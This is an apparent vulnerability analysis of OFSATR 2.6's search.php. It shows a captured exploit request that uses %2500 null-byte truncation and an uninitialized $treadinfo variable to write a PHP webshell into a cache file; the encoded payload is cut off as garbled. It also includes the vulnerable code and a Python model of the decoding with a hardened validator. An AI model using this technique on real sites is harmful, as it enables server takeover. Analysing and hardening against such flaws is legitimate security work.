A simple analysis of OFSATR 2.6 search vulnerabilities (vulnerability research)

Source: Internet
Author: User
Tags: chr, truncated
There are similar tools on the Internet, but I could not find an analysis article. I heard from Black that Hacker Handbook has one, but unfortunately I do not have the magazine, so I captured the request and then looked at the code and did a rough analysis. The vulnerability is ingenious and classic:

GET /search.php?keyword=by%20cn911&cachefile=an85.php%2500&treadinfo=<?fputs(fopen([the chr()-encoded remainder of the payload is garbled in the source and not recoverable] HTTP/1.1
accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
accept-language: zh-cn
accept-encoding: gzip, deflate
user-agent: mozilla/4.0 (compatible; MSIE 6.0; WINDOWS NT 5.1; SV1)
host: 127.0.0.1
This is the request I captured. Three variables are visible in it: $keyword, $cachefile and $treadinfo. $keyword can be any keyword; $cachefile must be a PHP file, that is, our PHP shell, followed by %2500, which decodes to %00, the null truncation character; $treadinfo is the code that writes the Trojan. I did not decode it, but my guess is that it is PHP code that writes a one-line Trojan into another PHP file.
PS: the decoded $treadinfo content begins as follows:
&treadinfo=<?fputs(fop
That covers the analysis of the captured request; now let's look at the search.php code and find where the vulnerability is.
The nth line of code is as follows:
$cachefile = rawurldecode($cachefile);

The rawurldecode function decodes an encoded URL string; search.php applies it to $keyword and $cachefile respectively. rawurldecode is also one of the keys here: after rawurldecode, the %00 becomes a real null byte, so on PHP versions below 5.0 it can act as a truncation even with gpc=on.
Line N+n of the code is as follows:
.....................
$keywordarray = explode("│", $keyword);
$keycount = count($keywordarray);
if ($sch_area == "C") {
    include './require/schall.php';
} elseif ($sch_area == "A") {
    for ($j = 0; $j < $keycount; $j++) {
        $keywordarray[$j] .= "|";  /* search author, exact match */
    }
    include './require/schpart.php';
} else {
    include './require/schpart.php';
}
if (!file_exists("userdata/cache/$cachefile.txt")) {
    ShowMsg("No content you want to find<br><br><br><a href='search.php'>continue searching</a></li></ul>");
}
...............................
Here search.php includes either schall.php or schpart.php, and the last line of code in both of those files is:
if ($treadinfo)
    writeover("./userdata/cache/$cachefile.txt", $treadinfo, "ab");
So whichever file is included, the content of $treadinfo is written to the cache file. Because $treadinfo is never initialized, you can supply your own shell code, and $cachefile can name a PHP file followed by %00, which truncates away the .txt suffix. This line is therefore where the Trojan gets written into the PHP file.
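The two-step decoding described above (PHP's query-string parsing turning %2500 into the literal text %00, then rawurldecode turning that into a real null byte) and the write sink just shown can be modelled in a few lines. This is an added example, not OFSATR's code: it reproduces the decode chain, shows the path the vulnerable file check would effectively open on older PHP, and puts a whitelist validator beside it as the hardened form. The parameter value is constructed from the captured request.

```python
import re
from urllib.parse import unquote

# Constructed sample value modelled on the captured request (not a real log entry).
CACHEFILE_PARAM = "an85.php%2500"   # %2500 -> "%00" after the first decode


def decode_like_vulnerable_search(param: str) -> str:
    """Reproduce the two decoding steps the vulnerable search.php applies.

    1. PHP's own query-string parsing decodes %25 to '%', leaving the literal
       text '%00' in $cachefile (no real NUL byte yet, so gpc escaping never sees one).
    2. search.php then calls rawurldecode(), which turns '%00' into a real NUL byte.
    """
    first_pass = unquote(param)          # "an85.php%00"
    return unquote(first_pass)           # "an85.php\x00"


def vulnerable_cache_path(cachefile_param: str) -> str:
    """Path the vulnerable code hands to file_exists()/fopen(): name + '.txt'."""
    return "./userdata/cache/" + decode_like_vulnerable_search(cachefile_param) + ".txt"


def effective_c_path(path: str) -> str:
    """Simulate C-string truncation at the first NUL byte, which is how older PHP
    builds ended up opening 'an85.php' instead of 'an85.php<NUL>.txt'."""
    return path.split("\x00", 1)[0]


def safe_cachefile(cachefile_param: str) -> str:
    """Hardened replacement (an assumption of this example, not the project's fix):
    decode the same way, then accept only a plain token, so NUL bytes, leftover '%'
    sequences, dots and directory separators are all rejected."""
    decoded = decode_like_vulnerable_search(cachefile_param)
    if "\x00" in decoded or not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", decoded):
        raise ValueError("invalid cachefile name")
    return "./userdata/cache/" + decoded + ".txt"


def is_rejected(cachefile_param: str) -> bool:
    """True when the hardened validator refuses the value."""
    try:
        safe_cachefile(cachefile_param)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(repr(vulnerable_cache_path(CACHEFILE_PARAM)))        # './userdata/cache/an85.php\x00.txt'
    print(effective_c_path(vulnerable_cache_path(CACHEFILE_PARAM)))  # ./userdata/cache/an85.php
    print(is_rejected(CACHEFILE_PARAM))                          # True
```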
By now the rough process behind this vulnerability should be fairly clear. Because I only read the code at an Internet café and did not test it specifically, some of the details are not given; please point out any errors. I also greatly admire the observation of Saiy, who discovered the flaw. Truly a very classic vulnerability :)
